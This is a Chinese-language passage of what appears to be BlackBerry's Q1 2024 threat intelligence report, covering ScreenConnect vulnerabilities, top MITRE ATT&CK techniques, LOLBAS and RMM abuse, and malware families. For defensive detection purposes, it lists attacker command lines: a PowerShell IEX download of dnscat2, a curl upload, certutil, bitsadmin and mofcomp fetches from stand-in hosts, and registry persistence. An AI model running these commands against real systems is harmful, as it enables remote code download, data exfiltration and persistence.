此漏洞會影響 ConnectWise ScreenConnect 23.9.7 產品。攻击者在野外利用了这两个漏洞。CVE-2024-1709(一个关键的身份验证绕过漏洞)允许攻击者创建管理帐户并利用 CVE-2024-1708(一个路径遍历漏洞),允许未经授权访问受害者的文件和目录。

MITRE 常用技术

了解威胁组织的高级技术有助于决定哪些检测技术应优先使用。在本报告所述期间,BlackBerry 观察到威胁行为者正在使用以下 20 大技术。

最后一栏中的向上箭头表示自上次报告以来,该技术的使用率有所上升 ;向下箭头表示使用率有所下降, 等号(=)表示该技术与上次报告中的位置相同。

技术名称 技术 ID 战术名称 最新报告 改变
工艺注入
T1055
特权升级、防御规避
1
=
发现系统信息
T1082
发现
3
DLL 侧加载
T1574.002
持久性、特权升级、防御规避
4
输入捕捉
T1056
凭证访问,收集
2
发现安全软件
T1518.001
发现
NA
伪装
T1036
防御回避
10
文件和目录发现
T1083
发现
13
过程探索
T1057
发现
19
应用层协议
T1071
命令与控制
6
注册表运行键值/启动文件夹
T1547.001
持久性、特权升级
9
非应用层协议
T1095
命令与控制
5
远程系统发现
T1018
发现
15
发现应用窗口
T1010
发现
NA
软件打包
T1027.002
防御回避
NA
预定任务/工作
T1053
执行、持久性、权限升级
8
视窗服务
T1543.003
持久性、特权升级
12
禁用或修改工具
T1562.001
防御回避
18
命令和脚本解释器
T1059
执行
7
混淆文件或信息
T1027
防御回避
NA
通过可移动媒体复制
T1091
初始通道,横向移动
11
技术 ID
工艺注入
T1055
发现系统信息
T1082
DLL 侧加载
T1574.002
输入捕捉
T1056
发现安全软件
T1518.001
伪装
T1036
文件和目录发现
T1083
过程探索
T1057
应用层协议
T1071
注册表运行键值/启动文件夹
T1547.001
非应用层协议
T1095
远程系统发现
T1018
发现应用窗口
T1010
软件打包
T1027.002
预定任务/工作
T1053
视窗服务
T1543.003
禁用或修改工具
T1562.001
命令和脚本解释器
T1059
混淆文件或信息
T1027
通过可移动媒体复制
T1091
战术名称
工艺注入
特权升级、防御规避
发现系统信息
发现
DLL 侧加载
持久性、特权升级、防御规避
输入捕捉
凭证访问,收集
发现安全软件
发现
伪装
防御回避
文件和目录发现
发现
过程探索
发现
应用层协议
命令与控制
注册表运行键值/启动文件夹
持久性、特权升级
非应用层协议
命令与控制
远程系统发现
发现
发现应用窗口
发现
软件打包
防御回避
预定任务/工作
执行、持久性、权限升级
视窗服务
持久性、特权升级
禁用或修改工具
防御回避
命令和脚本解释器
执行
混淆文件或信息
防御回避
通过可移动媒体复制
初始通道,横向移动
最新报告
工艺注入
1
发现系统信息
3
DLL 侧加载
4
输入捕捉
2
发现安全软件
NA
伪装
10
文件和目录发现
13
过程探索
19
应用层协议
6
注册表运行键值/启动文件夹
9
非应用层协议
5
远程系统发现
15
发现应用窗口
NA
软件打包
NA
预定任务/工作
8
视窗服务
12
禁用或修改工具
18
命令和脚本解释器
7
混淆文件或信息
NA
通过可移动媒体复制
11
改变
工艺注入
=
发现系统信息
DLL 侧加载
输入捕捉
发现安全软件
伪装
文件和目录发现
过程探索
应用层协议
注册表运行键值/启动文件夹
非应用层协议
远程系统发现
发现应用窗口
软件打包
预定任务/工作
视窗服务
禁用或修改工具
命令和脚本解释器
混淆文件或信息
通过可移动媒体复制

BlackBerry 威胁研究和情报团队使用MITRE D3FEND™为本报告所述期间观察到的技术制定了一份完整的应对措施清单,该清单可在我们的公共 GitHub 上查阅。

前三种技术是众所周知的程序,被对手用来收集关键信息以成功实施攻击。Applied Countermeasures(应用对策)部分包含一些使用实例和一些有用的监控信息。

从下图中可以看出所有技术和战术的影响:

图 13:观察到的 MITRE ATT&CK® 技术。

本报告期内最普遍的策略是防御回避,占本报告期内观察到的策略总数的 24%,其次是发现 ,占23%, 特权升级21%。
图 14:观察到的 MITRE ATT&CK 战术。

MITRE 著名技术的应用对策

BlackBerry 研究和情报小组分析了本报告所述期间观察到的五项 MITRE 技术:

  • 安全软件发现 - T1518.001

    这种流行技术允许网络威胁行为者查找目标系统或云环境中已安装的安全程序、配置和传感器列表。这对于希望不被发现的对手来说非常重要。例如,如果恶意团伙在被入侵的系统上运行了下面列出的命令之一,并检测到该环境已经具备了发现恶意活动的安全性,他们通常会放弃操作。在其他情况下,更高级、更顽固的团伙可以区分不同的安全应用程序,并找到绕过较弱应用程序的方法。这可能导致敌方获得系统或云环境的控制权。

    以下是攻击者可能用来评估您的安全性的命令行:

    • netsh firewall show
    • netsh.exe interface dump
    • findstr /s /m /i "defender" *.*
    • 任务列表 /v
    • Powershell Empire 模块 Get-AntiVirusProduct
    • cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

  • 伪装 - T1036

    这是一种复杂的网络威胁策略,攻击者利用它来伪装自己的活动,逃避检测。例如,通过使用虚假名称、图标和元数据,有害行为很容易伪装成标准的系统操作。伪装成合法文件或进程会诱骗用户和安全软件打开或保存虚假文件,从而导致系统渗透和数据丢失。(有关识别伪装方法的详细信息,请参阅本报告的CylanceMDR Observations部分)。

    以下是常见伪装方法的分类:

    • 重命名可执行文件:攻击者通常会重命名恶意可执行文件,以假装它们是合法的系统程序(如 svchost.exe、explorer.exe),并可能更改或添加其他虚假扩展名以隐藏真实文件类型,如 .txt.doc 或 .exe.config。其目的是在运行手动或自动系统检查时欺骗用户和安全工具,使用户在不理会任何系统警告的情况下运行或尝试打开恶意文件。
    • 模仿文件路径:在通常受信任的目录(例如:System32)中,安全工具的观察和检测较少。因此,攻击者通常会将恶意文件放在这些目录中,并给它们起合法的进程名来掩盖它们。
    • 无效代码签名:攻击者可能使用无效或被盗的数字证书签署恶意软件,以绕过安全措施。这将误导系统和用户信任恶意文件或进程,使其看起来像是由合法来源验证的。攻击者可能会使用过期、废止或欺诈性获得的证书。要识别这种策略,需要强大的证书验证流程和警报系统,以标记异常证书数据或验证失败。例如,将 cmd.exe 伪装成计算器应用程序:
      复制 c:\windows\system32\cmd.exe C:\calc.exe

  • 文件和目录发现 - T1083

    文件和目录发现通常用于攻击者的侦察阶段,以深入了解目标环境、识别潜在的外泄或篡改文件、定位敏感信息或支持攻击链的后续阶段。

    以下是用于此技术的命令行:

    • dir /s C:\path\to\directory' - 利用 dir 工具递归列出特定目录及其子目录中的文件和目录。
    • tree /F"(树 /F)- 使用树工具显示每个目录中的文件名和目录树。
    • 'powershell.exe -c "Get-ChildItem C:\path\to\directory"' - 在 powershell 中执行 Get-ChildItem cmdlet,它可以检索指定路径下的文件和目录列表。

    威胁行为者还可能使用本地 Windows API 函数来枚举文件和目录。以下是威胁行为者使用的 Windows API 函数:

    • FindFirstFile - 检索与指定文件名或目录名模式匹配的第一个文件或目录的信息。
    • FindNextFile - 继续之前调用 FindFirstFile 函数启动的文件搜索。
    • PathFileExists - 验证指定目录或文件是否存在。

  • 应用层协议 - T1071

    威胁行为者一直在寻找新的方法,将其行动隐藏在合法流量中,以避免被发现。应用层协议操纵(T1071)就是一种流行的技术。在 2024 年的前三个月,这种技术成为恶意行为者采用的五大战术之一。通过利用常用网络协议(如 HTTP、HTTPS、DNS 或 SMB)中的漏洞,对手可以将恶意活动完美地融入常规网络流量中。

    这种技术可用于数据外渗、实现 C2 通信以及在被入侵网络内横向移动。例如,对手可能会在 HTTP 标头中编码敏感数据,或利用 DNS 隧道绕过网络防御系统,在不引起怀疑的情况下提取信息。应用层协议操纵的隐蔽性给检测和归因带来了巨大挑战,因为许多传统安全工具难以区分正常和恶意网络活动。

    鉴于这种技术的普遍性和复杂性,企业必须采取积极主动的措施来加强防御。强大的网络监控解决方案必须能够检测异常流量模式,并确保将与应用层协议操纵相关的可疑行为与常规用户活动准确区分开来。

    此外,保持网络协议和应用程序的最新安全补丁可以减少已知漏洞和漏洞利用。通过实施端点检测和响应(EDR)解决方案,企业可以提高识别和响应通过应用层协议操纵实施的恶意活动的能力,从而加强整体网络安全态势。

    以下是威胁行为者使用的 APL 命令: curl -F "file=@C:\Users\tester\Desktop\test[.]txt 127[.]0[.]0[.]1/file/upload
    powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1')

  • 注册表运行键值/启动文件夹 - T1547.001

    注册表运行键/启动文件夹操纵是对手用来在被入侵系统上建立持久性的一种技术。在本报告所述期间,这种技术在网络威胁行为者使用的最主要策略中占据突出位置。通过篡改 Windows 注册表键值或在启动文件夹中添加恶意条目,敌方可确保其恶意有效载荷在系统启动或用户登录时自动执行,从而便于持续控制被入侵系统。

    这种技术使对手能够部署各种恶意软件,包括后门程序、键盘记录程序和勒索软件,从而保持对被入侵系统的持续访问。对手利用 Windows 的本地功能逃避检测。对合法系统配置的滥用使得传统防病毒解决方案在检测和缓解这些威胁时面临更大挑战。

    为了应对注册表运行键和启动文件夹被操纵所带来的威胁,企业必须采用多层次的端点安全方法:

    • 定期监控和审核 Windows 注册表键值和启动文件夹,以检测显示恶意活动的未经授权的更改。
    • 实施应用程序白名单,帮助防止未经授权的可执行文件。
    • 设置权限管理控制,限制对手操纵关键系统配置的能力。
    • 开展用户教育和提高认识计划,使员工有能力识别和报告可疑的启动项或注册表修改。
    • 增强整体威胁检测和响应能力。

    需要警惕的命令包括

        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"
    echo "" > "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\file[.]txt"

CylanceMDR 数据

报告的这一部分重点介绍了在CylanceMDR 客户环境中观察到的几种最常见的威胁检测。

CylanceMDR前身为CylanceGUARD®,是BlackBerry 提供的一项基于订阅的托管检测和响应 (MDR) 服务,可提供全天候监控,帮助企业阻止利用客户安全计划漏洞的复杂网络威胁。CylanceMDR 团队在报告期内跟踪了数千条警报。下面,我们将按地区对遥测数据进行细分,以便进一步了解当前的威胁状况。

图 15:按地区分列的五大警报。

CylanceMDR 意见

在本报告所述期间,CylanceMDR 团队发现Certutil 在安全操作中心 (SOC) 内引发了大量检测活动,即与 Certutil 等重命名工具相关的技术(例如:"可能的 Certutil 重命名执行")。在BlackBerry 保护客户的所有地理区域内,与此相关的检测活动激增。

在上一份报告中,我们讨论了诸如 Certutil 等离岸二进制文件和脚本 (LOLBAS) 实用程序是如何被威胁行为者滥用或误用的:他们经常重命名合法实用程序(如 Certutil),以试图逃避检测能力。这被称为masquerading,MITRE 技术 ID:T1036.003。防御者必须部署强大的检测能力,最大限度地降低伪装等规避技术的风险。例如,创建一个检测规则,只有在看到Certutil命令(以及该工具被滥用的任何选项/参数)时才触发,这样就很容易被规避。

以下面两条命令为例:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

如果你的检测能力只依赖于看到 certutil命令(连同其选项),这将被检测到,但被认为是一种弱保护,因为它很容易被规避。
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

在本例中,我们将certutil.exe改名为outlook.exe,这样就可以完全规避检测(如果使用上述逻辑)。

更好的解决方案是确保收集可移植可执行文件(PE)/进程元数据,如原始文件名(编译时提供的内部文件名),并将其集成到检测功能中。磁盘上的文件名与二进制文件的 PE 元数据不匹配是一个很好的指标,表明二进制文件在编译后被重新命名。

LOLBAS 活动

在本报告所述期间,我们注意到客户环境中的 LOLBAS 活动发生了变化:

  • regsvr32.exe有关的检测次数增加
  • 与 mshta.exe 有关的活动减少。
  • 与 bitsadmin.exe 相关的检测次数大幅增加。
图 16:CylanceMDR 检测到的 LOLBAS。


下面举例说明恶意使用 LOLBAS 的情况(不包括在上一报告期内共享的情况)。

文件: Bitsadmin.exe
米特雷T1197 | T1105
如何被滥用 

  • 从恶意主机或向恶意主机下载/上传(侵入工具传输)
  • 可用于执行恶意进程

Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest


文件: mofcomp.exe
Mitre:T1218
如何滥用 

  • 可用于安装恶意托管对象格式(MOF)脚本
  • MOF 语句由 mofcomp.exe 实用程序解析,并将文件中定义的类和类实例添加到 WMI 资源库中。

Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

托管 IT 服务提供商 (MSP) 经常使用远程监控和管理 (RMM) 工具来远程监控客户的端点。不幸的是,RMM 工具也允许威胁行为者访问这些系统。这些工具提供了大量管理功能,并为威胁行为者提供了一种通过使用受信任和认可的工具混入系统的方法。

2023 年,由于有关Scattered Spider(一个被认为是 2023 年 9 月美高梅国际娱乐平台攻击事件幕后黑手的网络攻击组织)的报道,RMM 工具滥用成为焦点。Scattered Spider 的成员被认为是复杂的社会工程专家,他们部署了各种技术,如 SIM 卡交换攻击、网络钓鱼和推送轰炸。他们在攻击中使用了一系列 RMM 工具,如

  • 泼水节
  • TeamViewer
  • 屏幕连接

自 ConnectWiseScreenConnect(23.9.8 以下的所有版本)发现两个漏洞以来,截至 2024 年第一个报告期,RMM 工具一直备受关注。CVE 详情如下:

CVE-2024-1709

CWE-288:使用替代路径或通道绕过身份验证。

CVE-2024-1708

CWE-22:对受限目录的路径名限制不当("路径遍历")。

下图说明了在本报告所述期间观察到的最常见的 RMM 工具。

图 17:CylanceMDR 。


在分析过程中,我们注意到许多客户使用多种 RMM 工具,从而增加了组织的攻击面和风险。建议采取的缓解措施包括

审计远程访问工具(RMM 工具)

  • 确定环境中当前使用的 RMM 工具。
  • 确认它们在环境中得到批准。
  • 如果使用多种 RMM 工具,确定是否可以合并。减少使用不同工具的数量可降低风险。

禁用端口和协议

  • 阻止与未经批准的远程访问工具相关的常用端口的入站和出站网络通信。

例行审计日志

  • 检测远程访问工具的异常使用。

修补

  • 确保定期审查与所使用的 RMM 工具相关的漏洞,并在必要时进行更新。
  • 在执行定期补丁周期时,RMM 工具等可访问互联网的软件应始终是重中之重。 

网络分割

  • 通过分割网络、限制对设备和数据的访问,最大限度地减少横向移动。

设备标签

  • 了解您的安全供应商是否提供标记使用 RMM 工具的设备的选项。如果有,请启用此选项,以确保 SOC 的可见性。有些供应商提供的选项可留下备注/标记,以识别经批准的工具/活动,这对分析人员的调查工作大有帮助。

内存加载 RMM

  • 使用可检测只在内存中加载的远程访问的安全软件。

结论

这份为期 90 天的报告旨在帮助您掌握相关知识,为应对未来威胁做好准备。在应对瞬息万变的网络安全威胁时,及时了解有关您所在行业、地区和关键问题的最新安全新闻很有帮助。以下是我们对 2024 年 1 月至 3 月的主要看法:

  • 根据我们内部的 "攻击阻止 "遥测数据,在全球范围内,BlackBerry 每天阻止37,000 次针对我们租户的攻击。 我们注意到,针对我们租户和客户的独特恶意软件大幅增加,每分钟比上一报告期增加 40%。这可能表明,威胁行为者正在采取大量措施,仔细锁定受害者。
  • 信息窃取者在我们的 "关键基础设施"、"商业企业 "和 "最大威胁 "部分表现突出。这表明,敏感数据和私人数据是所有地区和行业的威胁行为者都极力寻求的目标。
  • 我们在新的 "勒索软件 "章节中重点介绍了最著名的勒索软件群组,勒索软件正越来越多地瞄准关键基础设施,尤其是医疗保健。
  • BlackBerry 记录了 NIST 在过去三个月中披露的近 9,000 个新CVE 此外,在这些已披露的漏洞中,超过 56% 的关键度超过 7.0。与大量使用的合法软件(如 ConnectWise ScreenConnect、GoAnywhere 和多个真正的 Ivanti 产品)相关的漏洞,已被威胁行为者以惊人的速度加以利用,向未打补丁的受害计算机发送了大量恶意软件。
  • 通过 "假新闻 "和 "虚假信息 "进行的政治欺骗正越来越多地通过社交媒体传播,这在未来仍将是一个问题,尤其是与俄罗斯入侵乌克兰、中东冲突不断以及即将于 11 月举行的美国总统大选有关的问题。

有关顶级网络安全威胁和防御措施的更多信息,请访问BlackBerry 博客

致谢

本报告凝聚了我们优秀团队和个人的共同努力。我们要特别感谢

附录:关键基础设施和商业企业威胁

8Base 勒索软件:2023 年首次出现,是一个极具攻击性的勒索软件群组。在其短暂的历史中,它一直非常活跃,通常以北美和拉美国家的受害者为目标。该威胁组织利用各种策略来实现初始访问,然后还可能利用受害者系统的漏洞来最大限度地提高潜在赔付率。

阿玛迪(阿玛迪机器人):采用模块化设计的多功能僵尸网络。一旦进入受害者的设备,Amadey 就能接收来自 C2 服务器的指令,执行各种任务,即窃取信息和部署附加有效载荷。

Buhti: Buhti 是一种相对较新的勒索软件,它利用泄露的 LockBit 3.0(又名 LockBit Black)和 Babuk 勒索软件家族的变种来攻击 Windows 和 Linux 系统。此外,据了解,Buhti 还使用一种用 "Go "编程语言编写的自定义数据外渗工具,专门用于窃取带有特定扩展名的文件。勒索软件操作员还迅速利用了影响 IBM 的 Aspera Faspex 文件交换应用程序(CVE-2022-47986)和最近修补的 PaperCut 漏洞(CVE-2023-27350)的其他严重漏洞。

LummaStealer (LummaC2):基于 C 语言的信息窃取程序,以商业企业和关键基础设施组织为目标,侧重于从受害者设备中窃取私人和敏感数据。这种信息窃取程序通常通过地下论坛和 Telegram 群组进行推广和传播,通常依靠木马和垃圾邮件进行传播。

PrivateLoader:一个臭名昭著的下载器家族,自 2021 年以来一直在野外活动,主要针对北美的商业企业。PrivateLoader(顾名思义)是一种初始访问机制,便于将大量恶意有效载荷部署到受害者设备(即信息窃取器)上。PrivateLoader 通过地下的按安装付费(PPI)服务运营分发网络,为其持续使用和开发提供资金。

RaccoonStealer: MaaS 信息窃取器。自 2019 年以来,RaccoonStealer 的制作者已经增强了其躲避安全软件和传统防病毒软件的能力。根据BlackBerry的内部遥测,RaccoonStealer 已被观察到以北美的商业企业为目标。

RedLine(RedLine 窃取程序): 广泛传播的恶意软件信息窃取程序,通常通过 MaaS 出售。传播该恶意软件的威胁组织的主要动机似乎是获取经济利益,而不是政治、破坏或间谍活动。这就是 RedLine 积极瞄准各行各业和地理区域的原因。

雷姆科斯(RemcosRAT):一种商业级 RAT,用于远程控制计算机或设备。虽然被宣传为合法软件,但这种远程控制和监视软件经常被用作远程访问木马。

烟雾加载器: 一种常用的恶意软件,具有大量功能,即在受害者设备上部署其他恶意软件。SmokeLoader 是BlackBerry 通过多份全球威胁情报报告观察到的一种经常性威胁。在本报告期内,该恶意软件主要针对北美地区的商业和专业服务。

维达(VidarStealer):一种商品信息窃取程序,自 2018 年以来一直处于野外,并已发展成为一个重型武器化恶意软件家族。攻击者利用 ConnectWise 流行的 ScreenConnect RRM 软件中的漏洞部署了 Vidar。这两个 CVE(CVE-2024-1708 和 CVE-2024-1709)使威胁行为者能够绕过并访问关键系统。

法律声明

BlackBerry Global Threat Intelligence Report 中包含的信息仅供参考之用。对于本报告中引用的任何第三方声明或研究的准确性、完整性和可靠性,BlackBerry 不作任何保证,也不承担任何责任。本报告中的分析反映了我们的研究分析人员目前对现有信息的理解,可能会随着我们了解到的更多信息而发生变化。读者有责任在其私人和职业生活中应用这些信息时进行尽职调查。BlackBerry 不允许恶意使用或滥用本报告中提供的信息。